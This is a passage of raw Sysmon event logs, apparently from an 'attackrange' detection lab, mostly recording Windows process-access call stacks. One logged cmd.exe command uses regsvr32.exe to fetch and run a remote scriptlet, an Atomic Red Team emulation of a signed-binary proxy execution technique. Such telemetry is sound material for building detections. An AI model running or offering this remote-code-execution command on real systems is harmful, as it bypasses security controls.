22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032932Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032931Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032930Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5035ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e585de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4fc1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e531474(wow64) 154100x800000000000000032929Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.915{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000032928Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-err.txt2021-01-28 22:13:06.913 11241100x800000000000000032927Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-out.txt2021-01-28 22:13:06.913 22542200x800000000000000032950Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.910{00000000-0000-0000-0000-000000000000}7032raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;<unknown process> 10341000x8000000000000000361151Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:13.521{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361255Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.973{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+99dd|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed|C:\Windows\System32\user32.dll+15de2|C:\Windows\System32\shcore.dll+cbfc 10341000x8000000000000000361254Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.973{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+ae4a|C:\Windows\System32\windows.storage.dll+ad70|C:\Windows\System32\windows.storage.dll+a876|C:\Windows\System32\windows.storage.dll+9957|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d 10341000x8000000000000000361253Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.895{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+99dd|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\user32.dll+163ed|C:\Windows\System32\user32.dll+15de2|C:\Windows\System32\shcore.dll+cbfc 10341000x8000000000000000361252Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.895{8e433fbf-36ff-6013-ae03-000000001100}86282004C:\Windows\System32\RuntimeBroker.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.storage.dll+1331dc|C:\Windows\System32\windows.storage.dll+ae4a|C:\Windows\System32\windows.storage.dll+ad70|C:\Windows\System32\windows.storage.dll+a876|C:\Windows\System32\windows.storage.dll+9957|C:\Windows\System32\windows.storage.dll+97ed|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d 10341000x8000000000000000361251Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+137f7|C:\Windows\System32\windows.storage.dll+163b71|C:\Windows\System32\windows.storage.dll+163b0f|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+3ed14|C:\Windows\System32\windows.storage.dll+4b25f|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd|C:\Windows\System32\windows.storage.dll+91060|C:\Windows\System32\shcore.dll+c590 10341000x8000000000000000361250Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+137f7|C:\Windows\System32\windows.storage.dll+163a71|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+3ed14|C:\Windows\System32\windows.storage.dll+4b25f|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd|C:\Windows\System32\windows.storage.dll+91060|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218 10341000x8000000000000000361249Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+10012|C:\Windows\System32\shcore.dll+fb1d|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+163a50|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+3ed14|C:\Windows\System32\windows.storage.dll+4b25f|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc 10341000x8000000000000000361248Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+faf4|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+163a50|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+3ed14|C:\Windows\System32\windows.storage.dll+4b25f|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd 10341000x8000000000000000361247Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+137f7|C:\Windows\System32\windows.storage.dll+163b71|C:\Windows\System32\windows.storage.dll+163b0f|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd|C:\Windows\System32\windows.storage.dll+91060|C:\Windows\System32\shcore.dll+c590 10341000x8000000000000000361246Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+137f7|C:\Windows\System32\windows.storage.dll+163a71|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd|C:\Windows\System32\windows.storage.dll+91060|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218 10341000x8000000000000000361245Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+10012|C:\Windows\System32\shcore.dll+fb1d|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+163a50|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc 10341000x8000000000000000361244Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+faf4|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+163a50|C:\Windows\System32\windows.storage.dll+1638bf|C:\Windows\System32\windows.storage.dll+163f9e|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd 10341000x8000000000000000361243Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+10027|C:\Windows\System32\shcore.dll+fef7|C:\Windows\System32\shcore.dll+fe81|C:\Windows\System32\shcore.dll+fbaa|C:\Windows\System32\windows.storage.dll+8a925|C:\Windows\System32\windows.storage.dll+1640b2|C:\Windows\System32\windows.storage.dll+163e50|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc|C:\Windows\System32\windows.storage.dll+910cd 10341000x8000000000000000361242Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+10012|C:\Windows\System32\shcore.dll+fb1d|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+8a90d|C:\Windows\System32\windows.storage.dll+1640b2|C:\Windows\System32\windows.storage.dll+163e50|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\System32\windows.storage.dll+46d0c|C:\Windows\System32\windows.storage.dll+49786|C:\Windows\System32\windows.storage.dll+4964d|C:\Windows\System32\windows.storage.dll+492a9|C:\Windows\System32\windows.storage.dll+4a0cc 10341000x8000000000000000361241Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.801{8e433fbf-36ff-6013-ae03-000000001100}86285348C:\Windows\System32\RuntimeBroker.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\shcore.dll+12d94|C:\Windows\System32\shcore.dll+faf4|C:\Windows\System32\shcore.dll+dd6d|C:\Windows\System32\shcore.dll+dcff|C:\Windows\System32\shcore.dll+dc04|C:\Windows\System32\windows.storage.dll+8a90d|C:\Windows\System32\windows.storage.dll+1640b2|C:\Windows\System32\windows.storage.dll+163e50|C:\Windows\System32\windows.storage.dll+4af62|C:\Windows\System32\windows.storage.dll+4b185|C:\Windows\System32\windows.storage.dll+4124f|C:\Windows\System32\windows.storage.dll+3f63f|C:\Windows\System32\windows.storage.dll+3fd3a|C:\Windows\System32\windows.storage.dll+3dda8|C:\Windows\System32\windows.storage.dll+45953|C:\Windows\System32\windows.storage.dll+45476|C:\Windows\Syst